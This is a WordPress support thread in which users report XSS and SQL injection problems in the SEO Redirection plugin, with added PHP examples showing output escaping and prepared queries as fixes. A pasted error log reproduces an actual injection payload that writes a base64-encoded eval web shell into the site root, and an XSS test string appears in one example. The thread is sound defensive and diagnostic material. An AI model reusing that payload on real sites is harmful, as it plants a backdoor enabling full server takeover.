Vulnerability Found
-
I am getting this report “Vulnerability found: SEO Redirection <= 2.2 – Unauthenticated Stored Cross-Site Scripting (XSS)”
from plugin security scanner plugin. Should I be concerned?
-
I tested the plugin and it displayed the same message to me, but there is no XSS in the plugin, ignore this message, I will try to change the parameter names or the tag name to stop this message from appearing.
Hi Fakhri,
First of all – great plugin. Came in handy many times.
However one of my websites got hacked (sort of) recently. Weirdly the file system was clean but as I started digging it turned out that the SEO_404_links table was full of spammy links to some drug websites.
As a result Google picked up dozens of non-existent PDF’s which were in reality redirects to some dodgy websites.
I truncated the tables and removed the plugin (which solved the issue but still a long way before Google removes the “hacked” flag from search results) but the situation could indicate that there is indeed a vulnerability that allows such hacks.
I’d be happy to open a dialog with you about this potential issue.
Please contact me at http://www.clogica.com/contact-us and send a screenshot of these links to address the issue!
Hi Fakhri,
Good day!
I have installed this plugin on one of my sites and it got hacked around 3 weeks back and Google displayed “This site might have been hacked” message in the search results. With great difficulty we removed that message from Google search results. But our site got hacked again yesterday, so we did an investigation on this using some tools and we found a vulnerability in the plugin. Please see the below message displayed on the tool which we are using.
XSS Vulnerability in SEO Redirection Plugin
Continuing further investigation we also found that malicious javascript code can be injected by anyone. Can you please look into this and let us know if any of this is true?
SEO Redirection Plugin is vulnerable to stored XSS. On the “Settings > SEO Redirection > Redirection History” screen the referer link is not filtered. Malicious javascript code can be injected by anyone.
Thank you for your time. Have a nice day.
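The report above says the referer shown on the Redirection History screen is printed without filtering. As an added example, not code from the SEO Redirection plugin, here is the input/output handling that closes that gap: the Referer header is client-controlled, so it is stored as plain text and escaped with esc_html() at the moment it is written into the admin table. Function names (seo_demo_*) are hypothetical, and the two WordPress helpers are shimmed only when the file is run outside WordPress.

```php
<?php
// Added example, not the SEO Redirection plugin's own code: how a
// "Redirection History" screen should record and display the Referer
// header. Function names (seo_demo_*) are hypothetical. The two WordPress
// helpers used are shimmed only when WordPress is not loaded, so the file
// also runs from the PHP CLI.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}
if ( ! function_exists( 'wp_unslash' ) ) {
    function wp_unslash( $value ) {
        return stripslashes( (string) $value );
    }
}

// INPUT SIDE: the Referer header is set by the client, so anything at all can
// arrive here. Store it as plain text, capped in length; do not treat it as
// a trusted URL or as HTML.
function seo_demo_record_hit( array $server ) {
    $referer = isset( $server['HTTP_REFERER'] ) ? wp_unslash( $server['HTTP_REFERER'] ) : '';
    $request = isset( $server['REQUEST_URI'] ) ? wp_unslash( $server['REQUEST_URI'] ) : '';
    return array(
        'request' => substr( $request, 0, 2048 ),
        'referer' => substr( $referer, 0, 2048 ),
        'time'    => gmdate( 'Y-m-d H:i:s' ),
    );
}

// OUTPUT SIDE: the report in the thread says the stored referer was printed
// unfiltered. This is the pattern that produces stored XSS ...
function seo_demo_history_row_unsafe( array $row ) {
    return '<tr><td>' . $row['request'] . '</td><td>' . $row['referer'] . '</td></tr>';
}

// ... and this is the fix: every stored value is escaped at the point it is
// written into HTML, regardless of what was done on the way in.
function seo_demo_history_row( array $row ) {
    return '<tr><td>' . esc_html( $row['request'] ) . '</td>'
         . '<td>' . esc_html( $row['referer'] ) . '</td>'
         . '<td>' . esc_html( $row['time'] ) . '</td></tr>';
}

// Constructed request whose Referer carries markup.
$constructed_server = array(
    'HTTP_REFERER' => 'http://example.invalid/?q=<script>alert(1)</script>',
    'REQUEST_URI'  => '/missing-page.pdf',
);
$row = seo_demo_record_hit( $constructed_server );
echo seo_demo_history_row( $row ), "\n";
// The <script> becomes &lt;script&gt; in the table cell and is rendered as text.
```

Escaping at output time is the part that matters for this bug class: whatever ends up in the SEO_404_links or history table, the browser only ever receives it as text. Length-capping the stored value is a secondary measure that keeps a log table from being used as unbounded storage.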
Hi,
I will check this issue and solve it soon.
Thank you
Hi Fakhri,
One of my websites was recently hacked and my web developer tells me this was due to an sql injection on your plugin.
Can you confirm this?
Thanks,
Simon
My site was hacked. In the error log I found this line:
[16-Jun-2016 04:48:21 UTC] WordPress database error You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
'>|'; file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_deco' at line 1 for query select * from cbhac_WP_SEO_Redirection where enabled=1 and
regex=''
and (redirect_from='/?1=@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);echo '->|';
file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));
echo '|<-';'or redirect_from='/?1=@ini_set("display_errors","0");
@set_time_limit(0);@set_magic_quotes_runtime(0);
echo '->|';
file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));
echo '|<-';/' ) made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array, call_user_func_array, WPSR_redirect, W3_Db->query, W3_DbCache->query, W3_DbCallUnderlying->query, W3_Db->query, W3_DbProcessor->query, W3_Db->default_query
@the_specialist2005: This is not your topic. If you require assistance then, as per the Forum Welcome, please post your own topic.
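The query in that error log shows the requested path being spliced straight into the WHERE clause (redirect_from='...'), which is why a quote character in the URL can end the string literal and break the statement. As an added example, not the plugin's own code, here is the same lookup written with $wpdb->prepare() so the path is bound as data. The table name follows the log (prefix plus WP_SEO_Redirection); the function names (seo_demo_*) are hypothetical, and a minimal stand-in wpdb class is defined only when WordPress is not loaded so the file runs from the PHP CLI.

```php
<?php
// Added example, not the SEO Redirection plugin's own code: the redirect
// lookup from the error log, rewritten so the request path goes through
// $wpdb->prepare() instead of string concatenation. Function names
// (seo_demo_*) are hypothetical. The stand-in wpdb below exists only so
// the file runs outside WordPress; inside WordPress the real $wpdb is used.
if ( ! class_exists( 'wpdb' ) ) {
    class wpdb {
        public $prefix     = 'cbhac_';   // prefix seen in the log
        public $last_query = '';
        // Mimics the placeholder handling of WordPress's prepare(): every %s
        // is quoted and escaped, so a quote inside the value cannot end the
        // SQL string literal. (WordPress uses the MySQL driver's escaper.)
        public function prepare( $query, ...$args ) {
            $i = 0;
            return preg_replace_callback( '/%[sd]/', function ( $m ) use ( $args, &$i ) {
                $v = $args[ $i++ ];
                return $m[0] === '%d' ? (string) (int) $v : "'" . addslashes( (string) $v ) . "'";
            }, $query );
        }
        public function get_results( $sql ) {
            $this->last_query = $sql;
            return array();
        }
    }
    $wpdb = new wpdb();
}

// The shape the log shows: the raw path concatenated into the WHERE clause.
// A single quote in $path terminates the literal and the rest is parsed as SQL.
function seo_demo_lookup_unsafe( wpdb $wpdb, $path ) {
    $sql = "SELECT * FROM {$wpdb->prefix}WP_SEO_Redirection WHERE enabled=1 AND regex='' "
         . "AND (redirect_from='{$path}' OR redirect_from='{$path}/')";
    return $wpdb->get_results( $sql );
}

// Hardened: same query, with both path variants bound as parameters.
function seo_demo_lookup( wpdb $wpdb, $path ) {
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}WP_SEO_Redirection WHERE enabled=1 AND regex='' "
        . "AND (redirect_from=%s OR redirect_from=%s)",
        $path,
        rtrim( $path, '/' ) . '/'
    );
    return $wpdb->get_results( $sql );
}

// Constructed request path containing the character that broke the query in
// the log: a single quote.
$constructed_path = "/o'neil-report.pdf";
seo_demo_lookup( $wpdb, $constructed_path );
echo $wpdb->last_query, "\n";
// ... redirect_from='/o\'neil-report.pdf' OR redirect_from='/o\'neil-report.pdf/'
// The quote stays inside the literal, so the statement parses and simply
// matches nothing unless such a redirect exists.
```

A useful check on a live site is to search the web server and database logs for "WordPress database error" entries naming the plugin's table: with prepared queries in place, unusual characters in a requested path produce a no-match lookup and a normal 404 rather than a syntax error, so those entries should stop appearing.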
The topic ‘Vulnerability Found’ is closed to new replies.